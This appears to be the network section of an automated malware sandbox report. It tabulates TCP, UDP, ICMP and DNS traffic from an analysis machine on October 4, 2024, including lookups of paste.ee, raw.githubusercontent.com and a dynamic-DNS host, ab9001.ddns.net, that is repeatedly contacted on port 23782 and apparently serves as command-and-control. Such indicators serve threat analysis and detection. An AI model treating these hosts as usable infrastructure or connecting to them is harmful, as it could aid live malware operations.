                                                                                Oct 4, 2024 11:35:17.068032980 CEST55967443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:17.068048000 CEST4435596713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:17.068523884 CEST4435596713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:17.073440075 CEST55967443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:17.073555946 CEST4435596713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:17.098731995 CEST55968443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:17.098830938 CEST4435596813.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:17.098866940 CEST55967443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:17.098952055 CEST4435596713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:17.098985910 CEST55968443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:17.099173069 CEST4435596713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:17.099239111 CEST55967443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:17.099239111 CEST55967443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:21.954562902 CEST237825592464.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:21.954617977 CEST5592423782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:21.954921961 CEST5592423782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:21.962023973 CEST237825592464.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:22.887901068 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:22.887913942 CEST4435599113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:22.887954950 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:22.890093088 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:22.890100956 CEST4435599113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:22.891227961 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:22.891251087 CEST4435599213.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:22.891792059 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:22.891916037 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:22.891928911 CEST4435599213.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:22.973612070 CEST5599323782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:22.980776072 CEST237825599364.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:22.980859041 CEST5599323782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:22.987633944 CEST5599323782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:22.994889975 CEST237825599364.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:23.540745974 CEST4435599213.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:23.541052103 CEST4435599113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:23.541373968 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:23.541383028 CEST4435599213.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:23.542522907 CEST4435599213.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:23.542839050 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:23.546227932 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:23.546231985 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:23.546256065 CEST4435599113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:23.546319008 CEST4435599213.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:23.547580004 CEST4435599113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:23.547722101 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:23.548315048 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:23.548417091 CEST4435599113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:23.735927105 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:23.735928059 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:23.735943079 CEST4435599113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:23.735944986 CEST4435599213.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:23.840656996 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:23.840750933 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:27.145726919 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:27.145848036 CEST4435599213.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:27.145862103 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:27.145912886 CEST55992443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:27.145953894 CEST4435599113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:27.146122932 CEST55991443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:30.498146057 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:30.498189926 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:30.498258114 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:30.498758078 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:30.498770952 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:30.499439955 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:30.499490023 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:30.499694109 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:30.499880075 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:30.499891043 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:31.134129047 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:31.134377956 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:31.134413004 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:31.135910988 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:31.135983944 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:31.139024019 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:31.139111042 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:31.169312954 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:31.169811010 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:31.169836044 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:31.170852900 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:31.170995951 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:31.171358109 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:31.171441078 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:31.316163063 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:31.316179037 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:31.316185951 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:31.316200972 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:31.418544054 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:31.418561935 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:35.863794088 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:35.863884926 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:35.864069939 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:35.878870010 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:35.878968000 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:35.879030943 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:35.977293015 CEST56013443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:35.977336884 CEST4435601313.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:35.977361917 CEST56012443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:35.977396011 CEST4435601213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:39.596780062 CEST56026443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:39.596803904 CEST4435602613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:39.596869946 CEST56026443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:39.602061987 CEST56027443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:39.602092028 CEST4435602713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:39.602181911 CEST56027443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:39.602966070 CEST56027443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:39.602982044 CEST4435602713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:39.603266001 CEST56026443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:39.603280067 CEST4435602613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:40.249897957 CEST4435602713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:40.288151979 CEST4435602613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:40.345515966 CEST56027443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:40.345516920 CEST56026443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:40.412705898 CEST56026443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:40.412733078 CEST4435602613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:40.413604021 CEST56027443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:40.413609982 CEST4435602713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:40.414019108 CEST4435602613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:40.415071964 CEST4435602713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:40.416069031 CEST56026443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:40.416240931 CEST4435602613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:40.416946888 CEST56027443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:40.417148113 CEST4435602713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:40.537512064 CEST56026443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:40.537811041 CEST56027443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:44.377403021 CEST237825599364.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:44.377583027 CEST5599323782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:44.970150948 CEST4435602713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:44.970258951 CEST4435602713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:44.970313072 CEST56027443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:44.997908115 CEST4435602613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:44.998045921 CEST4435602613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:44.998095036 CEST56026443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:45.151041031 CEST5599323782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:45.155833006 CEST237825599364.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:46.165585995 CEST5603723782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:46.170535088 CEST237825603764.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:46.170682907 CEST5603723782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:46.174415112 CEST5603723782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:46.179260969 CEST237825603764.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:46.663888931 CEST56027443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:46.663916111 CEST4435602713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:46.663955927 CEST56026443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:46.663997889 CEST4435602613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:46.664612055 CEST56039443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:46.664644003 CEST4435603913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:46.664726019 CEST56039443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:46.665280104 CEST56040443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:46.665324926 CEST4435604013.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:46.665375948 CEST56040443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:46.665693998 CEST56040443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:46.665709972 CEST4435604013.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:46.665828943 CEST56039443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:46.665844917 CEST4435603913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:47.454819918 CEST4435603913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:47.455771923 CEST4435604013.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:47.475081921 CEST56040443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:47.475107908 CEST4435604013.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:47.475405931 CEST56039443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:47.475419044 CEST4435603913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:47.475533962 CEST4435604013.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:47.475908995 CEST4435603913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:47.477829933 CEST56040443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:47.477895975 CEST4435604013.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:47.478296041 CEST56039443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:47.478377104 CEST4435603913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:47.549432039 CEST56039443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:47.549453974 CEST56040443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:35:52.193959951 CEST4435603913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:52.194050074 CEST4435603913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:35:52.194080114 CEST4435604013.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:52.194133997 CEST56039443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:35:52.194463968 CEST4435604013.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:35:52.194519997 CEST56040443192.168.2.513.107.246.45

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 4, 2024 11:33:48.202822924 CEST6249753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:33:48.210391998 CEST53624971.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:51.286885023 CEST4919753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:33:51.296185970 CEST53491971.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:52.692913055 CEST53547531.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:52.968610048 CEST5927453192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:33:52.977555990 CEST53592741.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:58.038075924 CEST53544461.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:58.043220043 CEST53636011.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:59.556103945 CEST53556771.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:01.496284008 CEST5111153192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:01.496521950 CEST5289253192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:02.044235945 CEST6523153192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:02.044677019 CEST5067153192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:03.039217949 CEST53506711.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:03.039231062 CEST53652311.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:07.155858994 CEST6443553192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:07.156267881 CEST6530753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:07.341641903 CEST53506961.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:09.539875031 CEST5080953192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:09.540160894 CEST5556053192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:16.864934921 CEST53544701.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:35.832654953 CEST53491571.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:57.443927050 CEST53562401.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:58.777283907 CEST53619201.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:35:00.543437004 CEST5680253192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:35:00.553200960 CEST53568021.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:35:02.549645901 CEST5385753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:35:02.549782991 CEST6500753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:35:27.048477888 CEST53611431.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:35:42.157587051 CEST5518953192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:35:42.166039944 CEST53551891.1.1.1192.168.2.5

                                                                                ICMP Packets

                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                Oct 4, 2024 11:34:20.314686060 CEST192.168.2.51.1.1.1c265(Port unreachable)Destination Unreachable

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 4, 2024 11:33:48.202822924 CEST192.168.2.51.1.1.10x89c4Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:33:51.286885023 CEST192.168.2.51.1.1.10xead8Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:33:52.968610048 CEST192.168.2.51.1.1.10xc470Standard query (0)ab9001.ddns.netA (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.496284008 CEST192.168.2.51.1.1.10x1e7dStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.496521950 CEST192.168.2.51.1.1.10x3f81Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                Oct 4, 2024 11:34:02.044235945 CEST192.168.2.51.1.1.10xc242Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:02.044677019 CEST192.168.2.51.1.1.10xc920Standard query (0)www.google.com65IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.155858994 CEST192.168.2.51.1.1.10xcc8eStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.156267881 CEST192.168.2.51.1.1.10x448dStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                Oct 4, 2024 11:34:09.539875031 CEST192.168.2.51.1.1.10x61deStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:09.540160894 CEST192.168.2.51.1.1.10xeb4bStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                Oct 4, 2024 11:35:00.543437004 CEST192.168.2.51.1.1.10xaf5Standard query (0)ab9001.ddns.netA (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.549645901 CEST192.168.2.51.1.1.10x3a6Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.549782991 CEST192.168.2.51.1.1.10x9686Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                Oct 4, 2024 11:35:42.157587051 CEST192.168.2.51.1.1.10x7b15Standard query (0)ab9001.ddns.netA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 4, 2024 11:33:48.210391998 CEST1.1.1.1192.168.2.50x89c4No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:33:48.210391998 CEST1.1.1.1192.168.2.50x89c4No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:33:48.210391998 CEST1.1.1.1192.168.2.50x89c4No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:33:48.210391998 CEST1.1.1.1192.168.2.50x89c4No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:33:51.296185970 CEST1.1.1.1192.168.2.50xead8No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:33:51.296185970 CEST1.1.1.1192.168.2.50xead8No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:33:52.977555990 CEST1.1.1.1192.168.2.50xc470No error (0)ab9001.ddns.net64.188.16.157A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.502896070 CEST1.1.1.1192.168.2.50xa637No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.502896070 CEST1.1.1.1192.168.2.50xa637No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.502896070 CEST1.1.1.1192.168.2.50xa637No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.502896070 CEST1.1.1.1192.168.2.50xa637No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.503843069 CEST1.1.1.1192.168.2.50x80bbNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.504673958 CEST1.1.1.1192.168.2.50x1e7dNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.504673958 CEST1.1.1.1192.168.2.50x1e7dNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.504673958 CEST1.1.1.1192.168.2.50x1e7dNo error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.504673958 CEST1.1.1.1192.168.2.50x1e7dNo error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.505079031 CEST1.1.1.1192.168.2.50x3f81No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:01.505079031 CEST1.1.1.1192.168.2.50x3f81No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:03.039217949 CEST1.1.1.1192.168.2.50xc920No error (0)www.google.com65IN (0x0001)false
                                                                                Oct 4, 2024 11:34:03.039231062 CEST1.1.1.1192.168.2.50xc242No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.050694942 CEST1.1.1.1192.168.2.50x7f3aNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.050895929 CEST1.1.1.1192.168.2.50xcf34No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.050895929 CEST1.1.1.1192.168.2.50xcf34No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.050895929 CEST1.1.1.1192.168.2.50xcf34No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.163018942 CEST1.1.1.1192.168.2.50x448dNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.163018942 CEST1.1.1.1192.168.2.50x448dNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.163072109 CEST1.1.1.1192.168.2.50xcc8eNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.163072109 CEST1.1.1.1192.168.2.50xcc8eNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.163072109 CEST1.1.1.1192.168.2.50xcc8eNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:07.163072109 CEST1.1.1.1192.168.2.50xcc8eNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:09.547645092 CEST1.1.1.1192.168.2.50xeb4bNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:09.548552990 CEST1.1.1.1192.168.2.50x61deNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:11.022789001 CEST1.1.1.1192.168.2.50x7f0eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:11.024483919 CEST1.1.1.1192.168.2.50xb212No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:20.304296970 CEST1.1.1.1192.168.2.50x2f32No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:34:20.314511061 CEST1.1.1.1192.168.2.50x7a88No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:00.553200960 CEST1.1.1.1192.168.2.50xaf5No error (0)ab9001.ddns.net64.188.16.157A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.546556950 CEST1.1.1.1192.168.2.50xde09No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.546576023 CEST1.1.1.1192.168.2.50x7ec8No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.546576023 CEST1.1.1.1192.168.2.50x7ec8No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.546576023 CEST1.1.1.1192.168.2.50x7ec8No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
